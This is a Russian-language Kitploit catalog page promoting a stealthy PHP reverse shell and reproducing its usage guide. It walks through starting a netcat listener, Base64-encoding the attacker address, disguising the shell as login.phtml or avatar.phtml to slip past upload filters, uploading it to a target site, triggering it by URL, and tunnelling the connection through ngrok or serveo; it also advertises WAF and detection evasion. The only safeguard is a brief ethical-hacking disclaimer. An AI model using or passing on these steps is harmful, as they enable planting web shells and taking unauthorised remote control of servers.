Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PHP-REVERSE-SHELL — Это мощный и скрытный PHP-reverse shell, предназначенный для этичного хакинга и тестирования на проникновение. Он устанавливает надежное и тихое соединение обратно с вашей машиной. | Kitploit
Инструменты/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Генерация полезной нагрузкиОбход IDS/IPSЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Это мощный и скрытный PHP-reverse shell, предназначенный для этичного хакинга и тестирования на проникновение. Он устанавливает надежное и тихое соединение обратно с вашей машиной.

Репозиторий
111 месяцев назадЕщё не проверено

PHP Reverse Shell (Мощная и скрытная)

Это мощная и скрытная PHP-обратная оболочка, предназначенная для этичного взлома и тестирования на проникновение. Она устанавливает надёжное и незаметное соединение обратно с вашей машиной.

⚠️ Отказ от ответственности

Данная PHP-обратная оболочка разработана строго для образовательных целей и авторизованного тестирования на проникновение.
Разработчик не несёт ответственности за любое неправомерное использование, ущерб или незаконную деятельность, осуществлённую с помощью этого reverse_shell.
Используйте ответственно и только в системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированный доступ незаконен и наказуем по закону.

Возможности

  • IP-адрес и команда оболочки закодированы в Base64 для скрытности

  • Имена функций перевёрнуты для обхода WAF и фильтров безопасности

  • Тихий режим — никакого вывода для обнаружения

  • Автоматическое переподключение при обрыве соединения

  • Может работать как фоновый демон (если сервер это поддерживает)

  • Работает на большинстве серверов с поддержкой PHP

  • Поддерживает туннельные сервисы, такие как Ngrok, Serveo

  • Загружайте с расширением .phtml для обхода некоторых фильтров

Как использовать

1. Запустите слушатель на вашей машине

root@kitploit:~
nc -lvnp 4444

2. Закодируйте ваш IP или имя хоста в Base64

Используйте простую команду:

root@kitploit:~
echo "your_ip_or_hostname" | base64

Пример:

root@kitploit:~
echo "192.168.1.5" | base64

Скопируйте результат и замените значение $ip_b64 в скрипте PHP-обратной оболочки.

3. Обновите ваш скрипт PHP-обратной оболочки:

Измените эти строки, указав ваш IP/имя хоста в Base64 и порт:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. Переименуйте файл и загрузите

Переименуйте файл во что-то менее подозрительное, например:

  • login.phtml

  • avatar.phtml

  • update.phtml

Использование расширения .phtml помогает файлу выполняться на некоторых серверах, которые блокируют .php.

Загрузите этот файл на целевой сайт, где разрешена загрузка файлов.

5. Активируйте обратную оболочку

Откройте загруженный файл в браузере:

root@kitploit:~
http://target.com/uploads/login.phtml

После открытия ваш слушатель получит соединение обратной оболочки.

Использование туннелирования (когда ваш IP не является публичным)

Если вы используете мобильные данные или находитесь за роутером (NAT), ваш IP может не быть публичным. В таком случае обратная оболочка не сможет напрямую добраться до вашей машины.

Чтобы это исправить, используйте инструменты TCP-туннелирования, такие как Ngrok или Serveo.

Ngrok (рекомендуется)

Установите Ngrok
Запустите эту команду:

root@kitploit:~
ngrok tcp 4444

Она покажет что-то вроде:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Обновите ваш скрипт PHP-обратной оболочки:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Запустите ваш слушатель:

root@kitploit:~
nc -lvnp 4444

Serveo

Запустите эту команду:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Он скажет что-то вроде:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Обновите ваш скрипт PHP-обратной оболочки:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Запустите ваш слушатель:

root@kitploit:~
nc -lvnp 4444

Лицензия

Этот проект лицензирован под GNU General Public License v3.0

Скачать инструмент